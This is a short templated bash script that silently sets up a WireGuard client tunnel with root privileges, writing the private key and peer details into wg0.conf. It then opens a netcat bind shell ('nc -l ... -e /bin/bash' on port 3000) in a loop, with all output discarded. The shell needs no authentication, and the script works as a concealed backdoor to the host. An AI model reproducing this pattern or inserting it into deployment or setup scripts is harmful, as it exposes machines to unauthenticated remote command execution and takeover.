#!/bin/bash

sudo nohup bash << EOF2 >/dev/null 2>/dev/null &
{{ client.wg_install_cmd }}
cat <<EOF> /etc/wireguard/wg0.conf
[Interface]
Address = {{ client.ip }}/32
PrivateKey = {{ client.sk }}

[Peer]
PublicKey = {{ server.pk }}
Endpoint =  {{ server.endpoint_ip }}:{{ server.port }}
AllowedIPs = {{ server.network }}
PersistentKeepalive = 25

EOF

systemctl enable wg-quick@wg0
systemctl restart wg-quick@wg0
iptables -A INPUT -i wg0 -j ACCEPT
for run in {1..10}; do
	nohup nc -l -s {{ client.ip }} -p 3000 -e /bin/bash >/dev/null
done


EOF2
